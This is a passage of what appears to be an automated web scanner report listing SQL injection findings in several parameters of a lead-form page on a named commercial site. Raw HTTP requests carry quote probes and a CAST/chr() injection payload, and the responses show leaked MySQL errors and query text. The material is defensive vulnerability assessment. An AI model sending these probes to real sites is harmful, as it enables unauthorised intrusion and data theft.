GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=els198drmo79d5sg8t7492e5p2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code' OR prj.project_p' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=53skvpanfj64amtd83778qm5s7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.414. http://www.insideup.com/ppc/leadflow/incn00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc'&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ba3q0u8o53f5234u5ma0338of7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)&attributeId_342_g=2017__Accounting/Finance&attributeId_343_g=2009__1-9&' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc''&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lvvcb7cian8gc14e8mdno522i3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.415. http://www.insideup.com/ppc/leadflow/incn00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lqi4nkg18udbrls60nnel9cr34; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:25:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v3bia36783fmg6m5haedumir86; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.416. http://www.insideup.com/ppc/leadflow/incn00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1kben36ltraq8oi73qivmr76b2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8350


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
mitted or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=iups' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9a7eggp3la75rfqdp88mlmckm0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.417. http://www.insideup.com/ppc/leadflow/incn00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:26:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=chdkg6hit6adkb5r6p416n18j7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:26:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8kadvsrf6h1c1qa4cbpfrolhc0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.418. http://www.insideup.com/ppc/leadflow/incn00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:28:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o5qbmdt8fghth8j26f2gqfcku4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:29:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=l621tsn1rdt640s5cli1d6p936; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.419. http://www.insideup.com/ppc/leadflow/incn00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

